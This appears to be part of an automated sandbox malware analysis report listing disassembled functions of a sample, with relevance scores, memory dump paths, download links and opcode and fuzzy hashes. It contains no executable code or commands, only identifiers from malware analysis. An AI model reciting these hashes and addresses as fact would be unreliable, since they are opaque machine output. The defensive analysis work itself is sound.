                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a90ba3b36849960bdceebca7a53f751a3421e32b9646c123945f72aff4a27e6b
                                                                                        • Instruction ID: f0acc81b067879d7814e967fb373b38bff8aac9d736a5c4b3427563d09917be5
                                                                                        • Opcode Fuzzy Hash: a90ba3b36849960bdceebca7a53f751a3421e32b9646c123945f72aff4a27e6b
                                                                                        • Instruction Fuzzy Hash: C5C195B3F116254BF3584D78CD983A266839B95320F2F82788F4DAB7C5D87E9D0A5384
                                                                                        Function 0081C000 Relevance: .4, Instructions: 359COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c27481ceffb39f3688381bbdb6ee0db757632976f4809705656f812f9cf17c9b
                                                                                        • Instruction ID: af10b9810716333100b0b1badeb06d48e6f818dd715205fb3bb578b4b108bb3c
                                                                                        • Opcode Fuzzy Hash: c27481ceffb39f3688381bbdb6ee0db757632976f4809705656f812f9cf17c9b
                                                                                        • Instruction Fuzzy Hash: 07C15BF3F11A254BF3844829CC683A26583D7D5321F2F82788E5D6BBC6D87E9C0A5384
                                                                                        Function 00846372 Relevance: .4, Instructions: 359COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 02f37ee8ddb88da884cabc825ec4f426e04668caf8626bd330e5ede919cd3dd9
                                                                                        • Instruction ID: 6780fa432d936becb1172430fd7d6976fb96fade882bf02bdd9f057108673da4
                                                                                        • Opcode Fuzzy Hash: 02f37ee8ddb88da884cabc825ec4f426e04668caf8626bd330e5ede919cd3dd9
                                                                                        • Instruction Fuzzy Hash: 2EC178B3F116254BF3988879CD68362668397D5321F2F82388F5D6BBC9DC7E5D0A1284
                                                                                        Function 008BB027 Relevance: .4, Instructions: 353COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6d99e0ef7db8d66f5f6fa515c8c3b7fc1849b5c54329c56cdaf567ec94384934
                                                                                        • Instruction ID: 49d740174e7b332d3fec72941e686e333795c705c114a3804513e61784b027e2
                                                                                        • Opcode Fuzzy Hash: 6d99e0ef7db8d66f5f6fa515c8c3b7fc1849b5c54329c56cdaf567ec94384934
                                                                                        • Instruction Fuzzy Hash: 54C19BF3F1162547F3444829DC883A266839BD5325F2F82388E5CAB7C6ED7E9D0A5384
                                                                                        Function 0088D2D6 Relevance: .3, Instructions: 345COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b7568b6a817fa5c8a6bc5b55cd079fbde0c2848217cfd7e503e4138b300d0e1e
                                                                                        • Instruction ID: 74b822a085bf96a70d27c6944f297ee474285da4a2f36a95f469ca9ba76107ec
                                                                                        • Opcode Fuzzy Hash: b7568b6a817fa5c8a6bc5b55cd079fbde0c2848217cfd7e503e4138b300d0e1e
                                                                                        • Instruction Fuzzy Hash: A4C178F3F1152547F3584928CC683A266839BE5325F2F42388F5EAB7C6E87E5D0A5384
                                                                                        Function 0085008A Relevance: .3, Instructions: 344COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4701e5af8b9615d3fcbdd4d57a7269860781b44dfdf0818a6d4244f50751fd7a
                                                                                        • Instruction ID: 79327a0f0dfb8577f192038c01894d1dc50dc6a9a2632f8fcb2a53ed9e337701
                                                                                        • Opcode Fuzzy Hash: 4701e5af8b9615d3fcbdd4d57a7269860781b44dfdf0818a6d4244f50751fd7a
                                                                                        • Instruction Fuzzy Hash: 73C169B3F2152647F3644879CC583A266839BD4325F2F82788E4CABBC5D97E9D0A52C4
                                                                                        Function 008150AB Relevance: .3, Instructions: 344COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4a7388df800048e33d7bdca1f134704f34d170efb2fb99ff8cc14a939b1437dd
                                                                                        • Instruction ID: fa40a213f0b501af12126d721dd06f0732b8af08b2627ec5570025fa74a31e5f
                                                                                        • Opcode Fuzzy Hash: 4a7388df800048e33d7bdca1f134704f34d170efb2fb99ff8cc14a939b1437dd
                                                                                        • Instruction Fuzzy Hash: 34C18AB3F2152547F3584938CD583A26683DBE5324F2F82388F59AB7C5D97E9C0A5388
                                                                                        Function 00864100 Relevance: .3, Instructions: 341COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 115ecb898c2a0b8b85ebaa8ef91742cda67a1efa63b93e6676b8f11a8541aefc
                                                                                        • Instruction ID: 0ed37ba86521db4f858fe760b273b9c8738046f2bdcfafdd3a62ba7fe713e93f
                                                                                        • Opcode Fuzzy Hash: 115ecb898c2a0b8b85ebaa8ef91742cda67a1efa63b93e6676b8f11a8541aefc
                                                                                        • Instruction Fuzzy Hash: 6DC16AB3F116258BF3484D38CC983A26683EBD5315F2F82388E19AB7C9D97E5D095284
                                                                                        Function 0088E129 Relevance: .3, Instructions: 339COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c683df7c70fad84ed70be997596cea6958023887a576a353b0970e215c04ba2e
                                                                                        • Instruction ID: 9ee9d2c0eba0c060c76d058b664dab322c88666b702332320575d92a24fb31f7
                                                                                        • Opcode Fuzzy Hash: c683df7c70fad84ed70be997596cea6958023887a576a353b0970e215c04ba2e
                                                                                        • Instruction Fuzzy Hash: F6C1BFB3F516258BF3840978CC983A26683D7D5321F2F82788E18AB7C5DD7E9D0A5384
                                                                                        Function 00823009 Relevance: .3, Instructions: 336COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8120afdcf82c57758afd05d1207765429cc4fc948ee4dc5dfa9a30da0cbb1fe3
                                                                                        • Instruction ID: cd0d6a59c2f7d62a1a56cb490b079d685055e273d1dce23169d7a1578c3293ee
                                                                                        • Opcode Fuzzy Hash: 8120afdcf82c57758afd05d1207765429cc4fc948ee4dc5dfa9a30da0cbb1fe3
                                                                                        • Instruction Fuzzy Hash: E9C178B3F116254BF3580D28DCA83A26643EB95325F2F823C8F596B7C6D93E5C0A5384
                                                                                        Function 008125B3 Relevance: .3, Instructions: 332COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c30613c363179c3f5c40eced231bf3f73f8ad28af223a3fbb75941747e3a8dd8
                                                                                        • Instruction ID: 4667c41b5df8e11e1dc147527b520080c16bbb38134959f674ca2d7be0c6aa6a
                                                                                        • Opcode Fuzzy Hash: c30613c363179c3f5c40eced231bf3f73f8ad28af223a3fbb75941747e3a8dd8
                                                                                        • Instruction Fuzzy Hash: 6DB16AF7F10A244BF3484938DCA83A225839795325F2F82788F59AB7D6DC7E5C0A5384
                                                                                        Function 008D8014 Relevance: .3, Instructions: 331COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d3cb1cd92455648d208e114e5db04e48424debefaf9c122cd35c863390339504
                                                                                        • Instruction ID: 3d2e8a70330d92b0ccb5c2dd01f8c82810131ff0ae1f35a623307faae11702af
                                                                                        • Opcode Fuzzy Hash: d3cb1cd92455648d208e114e5db04e48424debefaf9c122cd35c863390339504
                                                                                        • Instruction Fuzzy Hash: CBB18AB3F116254BF3984D78CC983A26683DBD5311F2F82788E49AB7C9D97E5C0A5384
                                                                                        Function 008D422C Relevance: .3, Instructions: 330COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3fc3d0dc3f72adb2de6321e75ea9b5b194329049fade08371159a6e47897240e
                                                                                        • Instruction ID: cff697c1ea4f8078ce371cb60727ff2fc5dcc7d65863020aedb40287c5bf5c67
                                                                                        • Opcode Fuzzy Hash: 3fc3d0dc3f72adb2de6321e75ea9b5b194329049fade08371159a6e47897240e
                                                                                        • Instruction Fuzzy Hash: 33B199B7F116258BF3948D68CC983A27683EBD5314F2F82788E486B7C5D97E5C0A5780
